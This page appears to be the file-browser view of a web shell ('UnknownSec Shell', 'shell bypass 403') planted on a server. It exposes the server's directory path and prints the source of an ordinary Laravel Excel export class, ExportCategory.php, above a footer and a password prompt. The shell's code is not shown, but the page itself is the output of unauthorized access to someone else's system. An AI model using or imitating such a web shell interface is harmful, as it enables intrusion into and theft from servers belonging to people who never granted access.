shell bypass 403

UnknownSec Shell

: /home/bouloter/infix/app/Exports/ [ drwxr-xr-x ]

name : ExportCategory.php
<?php

namespace App\Exports;

use Illuminate\Contracts\View\View;
use Maatwebsite\Excel\Concerns\FromView;
use Modules\CourseSetting\Entities\Category;

class ExportCategory implements FromView
{

    public function view(): View
    {
        $categories = Category::whereNull('parent_id')->latest()->get();

        return view('quiz::exports.categories', [
            'categories' => $categories
        ]);
    }
}

© 2025 UnknownSec
afwwrfwafr45458465
Password